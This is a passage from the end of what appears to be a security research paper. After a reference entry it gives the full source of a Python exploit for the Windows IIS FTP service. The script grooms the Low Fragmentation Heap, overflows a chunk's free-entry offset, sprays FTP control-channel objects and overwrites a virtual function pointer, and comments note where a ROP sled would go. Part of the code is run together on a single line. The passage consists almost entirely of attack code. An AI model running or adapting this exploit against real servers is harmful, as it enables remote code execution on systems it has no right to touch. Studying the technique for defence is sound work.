[6] - Synchronization and Overlapped Input and Output
      (http://msdn.microsoft.com/en-us/library/windows/desktop/ms686358(v=vs.85).aspx)

--[ 10 - Exploit (thing.py)

import socket, sys, os, time

#Connection Info
HOST = "192.168.11.129"
PORT = 21
WAITP = 1

#Good Combo (60% reliability)
#LFHENABLESIZE = 0x78
#CONNCOUNT = 0x103
#=> FTP_SESSION::Log+0x16B
#call dword ptr [eax+18h] ds:0023:2424243c=????????

#The number of allocations to enable the LFH for our chosen size
LFHENABLESIZE = 0x78
LFHPOOLSIZE = LFHENABLESIZE + 0x3

#Each connection will create X amount of FTP_SESSION objects, which
#contain the virtual function we're trying to overwrite.
CONNCOUNT = 0x103 class SoftAlloc: s = 0 #Notice that the connection doesn't do a 'self.s.recv()' #This is a way to restrict un-needed calls to the completionroute def setup(self): self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.s.connect((HOST, PORT)) def alloc(self, data): self.s.send(data) def complete(self): self.buf = self.s.recv(1024) def free(self): self.s.close() #Pools are just a way to keep track of connections #It could have just as easily been an array of sockets class SoftLeak: def __init__(self): self.stag = {} self.untagged = [] def create_pool(self, num): for i in range(0, num): sa = SoftAlloc() sa.setup() self.untagged.append(sa) def clear_pool(self): while(len(self.untagged) > 0): sa = self.untagged.pop() sa.free() def alloc(self, tag, payload): if tag in self.stag: print "Error: Tag in use %s\n" % tag sys.exit() if len(self.untagged) > 0: sa = self.untagged.pop() self.stag[tag] = sa sa.alloc(payload) def realloc(self, tag, payload): if tag in self.stag: sa = self.stag[tag] sa.alloc(payload) def complete(self, tag): if tag in self.stag: sa = self.stag[tag] sa.complete() def free(self, tag): if tag not in self.stag: print "Error: Unknown tag %s\n" % tag sys.exit() sa = self.stag[tag] del self.stag[tag] sa.free() def countff(payload): count = 0 for x in payload: if x == "\xff" or x == "\xFF": count += 1 return count def analyze(payload): if len(payload) < 0x100: return first = payload[0:0x100] first_ffs = countff(first) print "[*] Sending %d 0xFFs in the 1st chunk" % first_ffs second = payload[0x100:] second_ffs = countff(second) print "[*] Sending %d 0xFFs in the 2nd chunk" % second_ffs #allocations have 0x80 added to them, making sizes < 0x81 hard to allocate def gen_payload(size, ch): if size < 0x80: print "Invalid allocation size" sys.exit(1) if size > 0x180 and size < 0x200: print "WARNING: Only allocating 0x180 bytes" new_size = size - 0x80 #print "Payload will be %d bytes" % (new_size) return (ch * new_size) def main(): 
    #create the initial amount of connections
    print "[*] Creating LFHPOOL"
    lfhpool = SoftLeak()
    lfhpool.create_pool(LFHPOOLSIZE)
    time.sleep(WAITP)

    ######################################################################
    #Go through LFHENABLESIZE connections, and make an allocation of a
    #certain size. This will enable the LFH for the size provided in
    #'gen_payload()'
    ######################################################################
    for i in range(0, LFHENABLESIZE):
        name = "lfh" + str(i)
        payload = gen_payload(0x180, "X")
        lfhpool.alloc(name, payload)

    ######################################################################
    #Send out exploit payload, this should be of the same subsegment as
    #the chunks we put in the LFH. It will write 0xFFs over the
    #FreeEntryOffset stored in the 1st two bytes of a free chunk in the
    #LFH
    #Note: Although it actually sends a payload of 0x1C0, it will only
    #allocate 0x180 bytes of data to be used for this transaction
    #Note2: This LFH chunk will be freed, hence the section below
    #requiring 3 allocations instead of the two necessary for the
    #FreeEntryOffset overwrite
    ######################################################################
    print "[*] Sending overflow payload"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST,PORT))
    data = s.recv(1024)

    buf = "\xff\xbb\xff\xff" * 112 + \
          "\r\n" #ends up allocating 0x180 (0x188 after chunk header)

    print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
    print "[*] Sending Payload...(%d bytes)" % len(buf)
    analyze(buf)
    s.send(buf)
    s.close()

    #create the pool of connections used for the FTP_CONTROL_CHANNEL spray
    print "[*] Creating CONNPOOL"
    connpool = SoftLeak()
    connpool.create_pool(CONNCOUNT)
    time.sleep(WAITP)

    ######################################################################
    #The LFH UserBlock should look like this
    #[previously_allocated_chunk][overwritten_chunk][malicious_chunk]
    #1) We have to make an allocation for the chunk that was used in the
    #overflow (since it was freed)
    #2) 'overwritten_chunk' should be all 0xFFs (including its
    #_HEAP_ENTRY header)
    #3) the 'malicious_chunk' will use a FreeEntryOffset of 0xFFFF (saved
    #from previous allocation)
    #
    #Now we can allocate a bunch of FTP_CONTROL_CHANNEL objects (see
    #ftpsvc.dll). These will be in the heap, so when we add
    #"UserBlocks + (0xFFFF * 8)" (i.e. UserBlocks + 0x7FFF8) it will
    #point to heap memory that contains a FTP_CONTROL_CHANNEL object,
    #which has a vtable as its first 4 bytes
    #
    #If the trailing '\n' is missing from the ftp command, the function
    #FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine() will not be called
    #until it sees the final '\n', which gives us control over WHEN the
    #call will be made
    ######################################################################
    print "[*] Sending 0x%X USER commands" % CONNCOUNT
    for i in range(0, CONNCOUNT):
        name = "ftpcmd" + str(i)
        connpool.alloc(name, "USER ")

    ######################################################################
    #1st: allocates a chunk saving its NextOffset
    #   - NextOffset = The one after our 'malicious_chunk'
    #2nd: allocates another, saving the tainted offset (0xFFFF)
    #   - NextOffset = 0xFFFF
    #3rd: will actually use the incorrect offset
    #   - Return value will be addr_of(UserBlock) + (0xFFFF * 8),
    #     i.e. addr_of(UserBlock) + 0x7FFF8
    #   - This is due to how the FreeEntryOffset is calculated
    #
    #The 0x170 filler bytes will allocate 0x180 bytes, but will also be
    #the data used to overwrite the USER_SESSION object called during
    #logging. The filler characters would be replaced with values to
    #start a ROP sled
    ######################################################################
    curr_char = 0x40
    for i in range(0, 3):
        curr_char += 1
        name = "trigger" + str(i)
        #allocates 0x180 bytes
        payload = "$$$$ " + (chr(curr_char) * 0x170)
        print "[*] Sending payload%d of %d bytes" % (i, len(payload))
        lfhpool.alloc(name, payload)

    ######################################################################
    #Sending the trailing '\n' will force the FTP_CONTROL_CHANNEL to call
    #its AsyncCompletionRoutine(), notifying the server that the
    #connection has been completed. Fortunately for us this function
    #pointer will have been overwritten by the 3rd iteration in the code
    #above: 'payload = "$$$$ " + (chr(curr_char) * 0x170)'.
    ######################################################################
    print "[*] Sending completing commands"
    start = 0
    end = CONNCOUNT
    print "Total completions: %d" % (end - start)
    for i in range(start, end):
        name = "ftpcmd" + str(i)
        print name
        connpool.realloc(name, "\n")

    ######################################################################
    #By waiting to exit, we will ensure that the AsyncCompletionRoutine
    #is NOT called due to the socket closing. It shouldn't matter, since
    #we've already triggered it above, but just to be safe
    ######################################################################
    print "[*] Exploit complete!"
    print "Press enter to exit"
    val = sys.stdin.readline()

if __name__ == "__main__":
    main()

--[ EOF